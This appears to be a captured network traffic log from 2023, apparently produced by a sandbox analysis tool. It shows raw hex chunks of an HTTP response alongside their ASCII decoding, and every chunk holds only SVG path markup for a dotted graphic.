                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4550INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 31 33 2c 31 38 35 2e 30 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38
                                                                                                                                                                                                                                                                          Data Ascii: ,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M209.13,185.05a2.17,2.17,0,0,1-1,2.82,3.18
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4566INData Raw: 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 30 37 2c 32 38 30 2e 34 31 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37
                                                                                                                                                                                                                                                                          Data Ascii: 9,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.07,280.41a2.16,2.16,0,0,1-1,2.82,3.17,3.17
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4582INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 36 39 2e 37 38 2c 31 33 30 2e 32 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d
                                                                                                                                                                                                                                                                          Data Ascii: "></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M269.78,130.26a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4598INData Raw: 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 38 2e 37 32 2c 32 32 35 2e 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: h><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M308.72,225.62a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4614INData Raw: 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 34 37 2e 36 37 2c 33 32 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M347.67,321a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4630INData Raw: 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 33 38 2c 31 37 30 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M369.38,170.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4646INData Raw: 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                          Data Ascii: 09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4662INData Raw: 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 31 33 2c 31 38 34 2e 38 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                                          Data Ascii: 3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"></path><path class="cls-9" d="M331.13,184.83a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4678INData Raw: 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 36 2e 36 39 2c 32 36 34 2e 34 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: 67,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9" d="M366.69,264.49a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5000INData Raw: 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2c 33 33 36 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M402,336.08a2,2,0,0,1-.9,2.6,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5016INData Raw: 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61
                                                                                                                                                                                                                                                                          Data Ascii: -3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><pa
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5032INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2c 32 36 31 2e 34 34 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: "></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M457,261.44a2,2,0,0,1-.91,2.6,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5048INData Raw: 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 32 35 2c 33 33 33 61 32 2c 32 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M492.25,333a2,2,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5064INData Raw: 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: 2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5080INData Raw: 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 32 34 2c 32 35 38 2e 33 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38
                                                                                                                                                                                                                                                                          Data Ascii: 33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.24,258.38a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5096INData Raw: 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5112INData Raw: 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,
